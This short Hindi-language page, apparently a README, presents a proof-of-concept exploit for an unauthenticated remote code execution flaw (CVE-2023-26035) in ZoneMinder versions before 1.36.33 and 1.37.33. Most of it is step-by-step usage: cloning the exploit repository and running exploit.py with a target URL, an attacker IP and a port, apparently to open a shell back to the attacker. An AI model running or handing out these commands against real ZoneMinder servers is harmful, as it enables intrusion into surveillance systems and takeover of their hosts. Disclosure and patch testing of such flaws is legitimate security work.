
ZoneMinder स्नैपशॉट्स में बिना प्रमाणीकरण के RCE - Poc एक्सप्लॉइट
ZoneMinder स्नैपशॉट्स में बिना प्रमाणीकरण के RCE - PoC एक्सप्लॉइट
alt img
ZoneMinder के 1.36.33 और 1.37.33 से पहले के संस्करण, स्नैपशॉट एक्शन में अनधिकृत पहुँच जाँच की कमी के कारण बिना प्रमाणीकरण के रिमोट कोड निष्पादन (Unauthenticated Remote Code Execution) के प्रति संवेदनशील हैं।
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
UnblvR ने इस कमज़ोरी की खोज की।